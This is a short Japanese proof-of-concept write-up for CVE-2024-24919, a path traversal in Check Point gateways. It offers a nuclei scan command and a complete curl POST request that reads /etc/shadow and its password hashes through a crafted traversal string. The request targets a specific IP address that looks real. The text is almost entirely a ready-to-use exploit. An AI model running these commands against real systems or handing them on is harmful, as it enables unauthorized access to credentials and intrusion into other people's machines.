
CVE-2024-24919の概念実証エクスプロイト。Check Pointのパストラバーサルで、巧妙に細工されたHTTPS POSTリクエストを介して任意のファイル読み取り(例:/etc/shadow)を可能にします。

nuclei -list chick.txt -t CVE-2024-24919.yaml
をターゲットIPアドレスに置き換えると、このコマンドは/etc/shadowファイル(パスワードハッシュを含む)へのアクセスを試みます。
curl --path-as-is -i -s -k -X POST \ -H 'Host: 117.102.198.7 ' \ -H 'Content-Length: 39' \ -H 'Connection: keep-alive' \ --data-binary 'aCSHELL/../../../../../../../etc/shadow' \ 'https://117.102.198.7/clients/MyCRL'
